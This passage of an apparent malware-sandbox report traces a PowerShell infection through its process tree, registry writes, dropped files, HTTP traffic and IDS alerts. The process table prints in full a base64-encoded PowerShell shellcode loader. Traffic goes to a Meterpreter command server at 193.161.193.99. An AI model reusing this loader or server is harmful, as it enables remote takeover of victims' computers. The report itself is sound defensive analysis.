kAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbgB4AEcAZwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbgB4AEcAZwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFYAeABVAGMAKQApADsAJABPAHgAeABmACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHEASQBNACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHEASQBNACAAJABPAHgAeABmACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AeAB4AGYAIAAkAGUAIgA7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3600 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABwAGkARQBBACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcABpAEUAQQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAYgBiACwAMAB4ADgAZQAsADAAeAAxAGQALAAwAHgAMgA0ACwAMAB4AGUAYQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1AGIALAAwAHgAMwAxACwAMAB4ADUAZQAsADAAeAAxADkALAAwAHgAOAAzACwAMAB4AGUAZQAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADUAZQAsADAAeAAxADUALAAwAHgANgBjACwAMAB4AGUAOAAsADAAeABkADgALAAwAHgAMAAyACwAMAB4AGYAMgAsADAAeAAxADMALAAwAHgAMgAxACwAMAB4AGQAMwAsADAAeAA5ADIALAAwAHgAOQBhACwAMAB4AGMANAAsADAAeABlADIALAAwAHgAOQAyACwAMAB4AGYAOQAsADAAeAA4AGQALAAwAHgANQA1ACwAMAB4ADIAMgAsADAAeAA4ADkALAAwAHgAYwAwACwAMAB4ADUAOQAsADAAeABjADkALAAwAHgAZABmACwAMAB4AGYAMAAsADAAeABlAGEALAAwAHgAYgBmACwAMAB4AGYANwAsADAAeABmADcALAAwAHgANQBiACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgAMwA5ACwAMAB4ADUAYgAsADAAeAAyADUALAAwAHgAMQAyACwAMAB4ADUAOAAsADAAeABkAGYALAAwAHgAMwA3ACwAMAB4ADQANwAsADAAeABiAGEALAAwAHgAZABlACwAMAB4AGYAOAAsADAAeAA5AGEALAAwAHgAYgBiACwAMAB4ADIANwAsADAAeABlADQALAAwAHgANQA3ACwAMAB4AGUAOQAsADAAeABmADAALAAwAHgANgAzACwAMAB4AGMANQAsADAAeAAxAGUALAAwAHgANwA0ACwAMAB4ADMAOQAsADAAeABkADYALAAwAHgAOQA1ACwAMAB4AGMANgAsADAAeABhAGMALAAwAHgANQBlACwAMAB4ADQAOQAsADAAeAA5AGUALAAwAHgAYwBmACwAMAB4ADQAZgAsADAAeABkAGMALAAwAHgAOQA0ACwAMAB4ADkANgAsADAAeAA0AGYALAAwAHgAZABlACwAMAB4ADcAOQAsADAAeABhADMALAAwAHgAZAA5ACwAMAB4AGYAOAAsADAAeAA5AGUALAAwAHgAOAA5ACwAMAB4ADkAMAAsADAAeAA3ADMALAAwAHgANQA0ACwAMAB4ADYANgAsADAAeAAyADMALAAwAHgANQAyACwAMAB4AGEANAAsADAAeAA4ADcALAAwAHgAOAA4ACwAMAB4ADkAYgAsADAAeAAwADgALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeABkAGMALAAwAHgAYQBmACwAMAB4ADYANAAsADAAeABhADcALAAwAHgAMQA0ACwAMAB4AGMAYwAsADAAeAAxADkALAAwAHgAYgAwACwAMAB4AGUAMgAsADAAeABhAGUALAAwAHgAYwA1ACwAMAB4ADMANQAsADAAeABmADEALAAwAHgAMAA5ACwAMAB4ADgAZQAsADAAeABlAGUALAAwAHgAZABkACwAMAB4AGEAOAAsADAAeAA0ADMALAAwAHgANgA4ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMgA4ACwAMAB4AGYAZQAsADAAeABmADEALAAwAHgAYQBiACwAMAB4AGEAZgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4AGQAMAAsADAAeAAyADQALAAwAHgAZAAyACwAMAB4ADUAZAAsADAAeAA1ADEALAAwAHgANwBlACwAMAB4AGYAMQAsADAAeAA3ADkALAAwAHgAMwA5ACwAMAB4ADIANQAsADAAeAA5ADgALAAwAHgAZAA4ACwAMAB4AGUANwAsADAAeAA4ADgALAAwAHgAYQA1ACwAMAB4ADMAYgAsADAAeAA0ADgALAAwAHgANwA1ACwAMAB4ADAAMAAsADAAeAAzADcALAAwAHgANgA1ACwAMAB4ADYAMgAsADAAeAAzADkALAAwAHgAMQBhACwAMAB4AGUAMgAsADAAeAAxAGEALAAwAHgAMgA3ACwAMAB4AGQAMQAsADAAeABmADIALAAwAHgAOABhACwAMAB4AGQAMAAsADAAeAA3ADAALAAwAHgAOQBkACwAMAB4ADIAMwAsADAAeAA0AGIALAAwAHgAZQBiACwAMAB4ADIAZAAsADAAeABjADQALAAwAHgANQA1ACwAMAB4AGUAYwAsADAAeAA1ADIALAAwAHgAZgBmACwAMAB4AGEAYgAsADAAeAAyADkALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAA5ADgALAAwAHgAOQBlACwAMAB4ADUAMwAsADAAeAAzAGEALAAwAHgAMgA1ACwAMAB4ADcANwAsADAAeAAyAGQALAAwAHgAMQBkACwAMAB4AGEANgAsADAAeABhADIALAAwAHgAOQBlACwAMAB4ADMAMgAsADAAeAAzADMALAAwAHgANABlACwAMAB4ADcAMgAsADAAeABlADcALAAwAHgAYQBiACwAMAB4AGMAZAAsADAAeAAyAGEALAAwAHgAMAA3ACwAMAB4ADIAYwAsADAAeAAwADYALAAwAHgANABlACwAMAB4ADAANwAsADAAeAAyAGMALAAwAHgAZAA2ACwAMAB4ADQAMAAsADAAeAA3ADIALAAwAHgAMQBjACwAMAB4AGUAMwAsADAAeABkAGYALAAwAHgAMwA4ACwAMAB4ADYAYgAsADAAeAAzAGIALAAwAHgAOQA2ACwAMAB4AGEANQAsADAAeABmADUALAAwAHgANAAxACwAMAB4ADEAMgAsADAAeAA3ADAALAAwAHgAOQA5ACwAMAB4AGYAZgAsADAAeABjAGIALAAwAHgAMQA0ACwAMAB4ADMAOQAsADAAeAA0AGQALAAwAHgAYQAzACwAMAB4AGQAZAAsADAAeABhADYALAAwAHgANgAwACwAMAB4ADAAZAAsADAAeAA1ADAALAAwAHgANAA1ACwAMAB4ADEAYQAsADAAeAAwADUALAAwAHgAMgAzACwAMAB4ADkANQAsADAAeAA4AGMALAAwAHgAOABkACwAMAB4AGUANAAsADAAeAAxAGMALAAwAHgAYgAzACwAMAB4ADgAOAAsADAAeABmADUALAAwAHgAYwBhACwAMAB4ADQANQAsADAAeABkADIALAAwAHgANQBhACwAMAB4ADkAZAAsADAAeAA1ADUALAAwAHgAZAA5ACwAMAB4ADMANAAsADAAeABkADkALAAwAHgAMAA1ACwAMAB4ADgAZQAsADAAeAA5ADcALAAwAHgAYgA2ACwAMAB4AGYAYQAsADAAeAA2ADYALAAwAHgANwBmACwAMAB4AGQAMgAsADAAeABhADgALAAwAHgAYQA4ACwAMAB4ADQANAAsADAAeABkAGIALAAwAHgAOAA2ACwAMAB4ADIAMwAsADAAeABkADAALAAwAHgAMgA5ACwAMAB4ADcANgAsADAAeAAxAGYALAAwAHgANwA3ACwAMAB4ADcAZAAsADAAeABkAGIALAAwAHgAYwA5ACwAMAB4ADEAZgAsADAAeABhAGMALAAwAHgAZABkACwAMAB4AGUAZAAsADAAeABhADQALAAwAHgANQAxACwAMAB4ADMANAAsADAAeAA4ADgALAAwAHgAOQBhACwAMAB4AGQAYgAsADAAeABhADEALAAwAHgAZgBiACwAMAB4ADkAMgAsADAAeAAzADcALAAwAHgAYwBlACwAMAB4AGYAYgAsADAAeABjAGEALAAwAHgANwAzACwAMAB4ADMAZQAsADAAeABjAGUALAAwAHgAZQBhACwAMAB4ADgAMwAsADAAeAA2AGIALAAwAHgANwBlACwAMAB4ADkAZgAsADAAeAA5AGEALAAwAHgAZgBjACwAMAB4ADcAMQAsADAAeABlAGEALAAwAHgAZgBmACwAMAB4AGEAYgAsADAAeAA4AGUALAAwAHgAYwAxACwAMAB4ADYAYQAsADAAeAAxADQALAAwAHgAMQA5ACwAMAB4AGUAOQAsADAAeAA3AGEALAAwAHgAOQA0ACwAMAB4AGQAOQAsADAAeAA4ADEALAAwAHgANwBhACwAMAB4ADkANAAsADAAeAA5ADkALAAwAHgANQAxACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgANAAxACwAMAB4AGYANQAsADAAeAA5AGQALAAwAHgAMQA5ACwAMAB4ADgAZQAsADAAeAAyADAALAAwAHgAYgAyACwAMAB4AGIAMQAsADAAeAAyADIALAAwAHgANAAzACwAMAB4ADUAMgAsADAAeAA2ADIALAAwAHgAYQBkACwAMAB4ADUAMwAsADAAeABiAGQALAAwAHgAOABkACwAMAB4ADIAZAAsADAAeAAwADAALAAwAHgAZQBiACwAMAB4AGUANQAsADAAeAAzAGYALAAwAHgAMwAwACwAMAB4ADkAYQAsADAAeAAxADQALAAwAHgAYwAwACwAMAB4AGUAOQAsADAAeAAxADgALAAwAHgAMQA4ACwAMAB4ADQAYgAsADAAeABkAGMALAAwAHgAYQA4ACwAMAB4ADkAZQAsADAAeABiADUALAAwAHgAMQBkACwAMAB4ADIAYgAsADAAeAA2ADAALAAwAHgAYwAwACwAMAB4ADQANAAsADAAeAA2AGMALAAwAHgAYQAyACwAMAB4ADcANAAsADAAeAA2AGUALAAwAHgAZgAwACwAMAB4AGQAYgAsADAAeAA3ADQALAAwAHgAOQAxACwAMAB4ADMAYQAsADAAeAAxAGQALAAwAHgAYgA4ACwAMAB4ADQAMwAsADAAeAAwAGMALAAwAHgANgBiACwAMAB4ADgAZgAsADAAeABiADUALAAwAHgANQBmACwAMAB4AGEAYQAsADAAeABkAGMALAAwAHgAZQA3ACwAMAB4AGEANgAsADAAeABmADUALAAwAHgAMgAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABuAHgARwBnAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABuAHgARwBnAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABuAHgARwBnACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2136 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\e4m1br6f.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3276 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAB7C.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAB7B.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
(PID) Process: | (1232) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2396) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3600) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3600) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3600) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 46000000A1000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1232 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UY3FKO0C8PKA4UGHGNND.temp | — | |
MD5:— | SHA256:— | |||
2396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XSC6F0OKBWFGYVNQZ1ZD.temp | — | |
MD5:— | SHA256:— | |||
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RARMWTC9VT56I6RWIFNP.temp | — | |
MD5:— | SHA256:— | |||
2136 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCAB7B.tmp | — | |
MD5:— | SHA256:— | |||
2136 | csc.exe | C:\Users\admin\AppData\Local\Temp\e4m1br6f.pdb | — | |
MD5:— | SHA256:— | |||
2136 | csc.exe | C:\Users\admin\AppData\Local\Temp\e4m1br6f.dll | — | |
MD5:— | SHA256:— | |||
3276 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAB7C.tmp | — | |
MD5:— | SHA256:— | |||
2136 | csc.exe | C:\Users\admin\AppData\Local\Temp\e4m1br6f.out | — | |
MD5:— | SHA256:— | |||
1232 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa6a37c.TMP | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 | |||
3600 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3B712DE36DC1672EC51A90C5EE31744F | SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 128 b | malicious |
3600 | powershell.exe | POST | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 571 b | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 571 b | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMO5g-6MlatI | RU | executable | 177 Kb | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 571 b | malicious |
3600 | powershell.exe | POST | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 144 b | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 128 b | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 144 b | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 144 b | malicious |
3600 | powershell.exe | GET | 200 | 193.161.193.99:24221 | http://193.161.193.99:24221/u05AD70vefzDUcJQndMT0gJX8XHLQbyeFyapeA2_5QHGtohntzrqG5uX2pWM9Fj0Gvlo_nTWevzv/ | RU | binary | 144 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3600 | powershell.exe | 193.161.193.99:24221 | — | OOO Bitree Networks | RU | malicious |
PID | Process | Class | Message |
---|---|---|---|
3600 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3600 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3600 | powershell.exe | A Network Trojan was detected | ET TROJAN Possible Metasploit Payload Common Construct Bind_API (from server) |
3600 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] BackDoor.Meterpreter.19 |
3600 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Metasploit HTTP header |
3600 | powershell.exe | Exploitation attributes have been detected | SHELL [PTsecurity] Meterpreter HTTP session opened: RSA2048 key exchange |
3600 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Metasploit HTTP header |
3600 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Metasploit HTTP header |
3600 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Metasploit HTTP header |
3600 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Metasploit HTTP header |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|